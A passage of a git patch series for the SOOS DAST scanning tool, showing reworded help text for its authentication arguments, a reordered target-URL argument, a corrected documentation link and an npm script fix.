 | `--buildVersion` | None | Version of application build artifacts |
 | `--checkoutDir` | None | Checkout directory to locate SARIF report |
-| `--clientId` | None | SOOS Client ID - get yours from https://app.soos.io/integrate/sca |
+| `--clientId` | None | SOOS Client ID - get yours from https://app.soos.io/integrate/dast |
 | `--commitHash` | None | The commit hash value from the SCM System |
 | `--contextFile` | None | Context file which will be loaded prior to scanning the target |
 | `--debug` | False | Enable debug logging for ZAP. |
diff --git a/src/index.ts b/src/index.ts
index 155506f..68cff15 100644
--- a/src/index.ts
+++ b/src/index.ts
@@ -135,22 +135,22 @@ class SOOSDASTAnalysis {
     });
 
     parser.add_argument("--authLoginURL", {
-      help: "Login URL to use in auth apps.",
+      help: "Login URL to use when authentication is required.",
       required: false,
     });
 
     parser.add_argument("--authPassword", {
-      help: "Password to use in auth apps.",
+      help: "Password to use when authentication is required.",
       required: false,
     });
 
     parser.add_argument("--authPasswordField", {
-      help: "Password input id to use in auth apps.",
+      help: "Password input id to use when authentication is required.",
       required: false,
     });
 
     parser.add_argument("--authSecondSubmitField", {
-      help: "Second submit button id to use in auth apps.",
+      help: "Second submit button id to use when authentication is required.",
       required: false,
     });
 
@@ -167,17 +167,17 @@ class SOOSDASTAnalysis {
     });
 
     parser.add_argument("--authSubmitField", {
-      help: "Submit button id to use in auth apps.",
+      help: "Submit button id to use when authentication is required.",
       required: false,
     });
 
     parser.add_argument("--authUsername", {
-      help: "Username to use in auth apps.",
+      help: "Username to use when authentication is required.",
       required: false,
     });
 
     parser.add_argument("--authUsernameField", {
-      help: "Username input id to use in auth apps.",
+      help: "Username input id to use when authentication is required.",
       required: false,
     });
 
@@ -299,10 +299,6 @@ class SOOSDASTAnalysis {
       required: false,
     });
 
-    parser.add_argument("targetURL", {
-      help: "Target URL - URL of the site or api to scan. The URL should include the protocol. Ex: https://www.example.com",
-    });
-
     parser.add_argument("--otherOptions", {
       help: "Other command line arguments sent directly to the script for items not supported by other command line arguments",
       required: false,
@@ -374,6 +370,10 @@ class SOOSDASTAnalysis {
       nargs: "*",
     });
 
+    parser.add_argument("targetURL", {
+      help: "Target URL - URL of the site or api to scan. The URL should include the protocol. Ex: https://www.example.com",
+    });
+
     soosLogger.info("Parsing arguments");
     return parser.parse_args();
   }

From 266181d75b53c2c7f3e5e1e87675fbc623607d60 Mon Sep 17 00:00:00 2001
From: SOOS-JAlvarez <jalvarez@soos.io>
Date: Tue, 7 Nov 2023 14:28:08 -0300
Subject: [PATCH 26/26] npm outdated fix

---
 package.json | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/package.json b/package.json
index 46ba8c9..f48ee92 100644
--- a/package.json
+++ b/package.json
@@ -13,8 +13,7 @@
     "format": "prettier ./src --check",
     "format:fix": "prettier ./src --write",
     "typecheck": "tsc --noEmit",
-    "check": "npm run format && npm run typecheck && npm outdate",
-    "outdated": "npm outdated"
+    "check": "npm run format && npm run typecheck && npm outdated"
   },
   "dependencies": {
     "@soos-io/api-client": "0.1.5",